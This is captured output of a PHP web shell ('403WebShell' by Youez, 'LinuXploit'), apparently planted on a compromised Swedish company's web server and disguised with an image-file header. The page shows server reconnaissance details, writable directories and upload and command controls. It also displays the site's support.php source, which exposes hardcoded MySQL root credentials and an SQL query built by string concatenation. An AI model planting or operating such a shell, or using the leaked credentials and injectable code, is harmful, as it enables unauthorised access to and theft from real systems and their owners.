????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.222.82.248
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/digitaliseringstrappan.astacus.se/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/digitaliseringstrappan.astacus.se/support.php
<?php
    session_start();

    if($_SESSION['DIGTRAPP_LOGIN'][0] == ""){
        header("location: index.php");
    }

    $link = mysql_connect ("localhost", "root", "root123");
    mysql_select_db ("fi2xml_tool");


	$sql = "SELECT * FROM tblLicenses WHERE id = '".$_SESSION['DIGTRAPP_LOGIN'][0]."'";
   
	$result = mysql_query($sql);
    while ($row = mysql_fetch_assoc($result)){ 
        $SystemUserId = $row['id'];
        $Admin = $row['Admin'];
        $CompanyId = $row['CompanyId'];
        $Username = $row['Username'];
        $Company = $row['Company'];
        $GUID = $row['GUID'];
        
    }
?>

<!DOCTYPE html>
<html lang="sv">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Konto - Webbportal</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <!-- Sidebar Menu -->
    <aside id="sidebar"><br>
      ASTACUS TOOLBOX<br>
      <hr>
      <nav>
        <ul>
          <li><a href="konto.php"><img src="images/konto.png" width="15" height="15" alt="" class="center"/> Konto / Licens</a></li>
         <?php if($Admin == "1"){?>
          <li><a href="admin.php"><img src="images/admin.png" width="15" height="15" alt="" class="center"/> Administration</a></li>
          <?php }?>
          <li><a href="download.php"><img src="images/download.png" width="15" height="15" alt="" class="center"/> Nedladdning</a></li>
          <li><a href="support.php"><img src="images/support.png" width="15" height="15" alt="" class="center"/> Support</a></li>
        </ul>
        <br>
        <hr>
        <ul>
          <li><a href="index.php?logout=true">Logga ut</a></li>
        </ul>
      </nav>
      <nav>
</nav>
<nav>
      </nav>
    </aside>

    <!-- User Account Section -->
    <main>
        <section id="account-section">
            <h2>Support</h2>
            Vi finns på telefon 0141-540 48, måndag till fredag 08:00-17:00.<br>
			<br>
Om du inte kommer fram direkt, skicka ett mail till support@astacus.se<br>
			så här vi av oss så fort vi kan!
			
			
           
           
            
      </section>
    </main>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit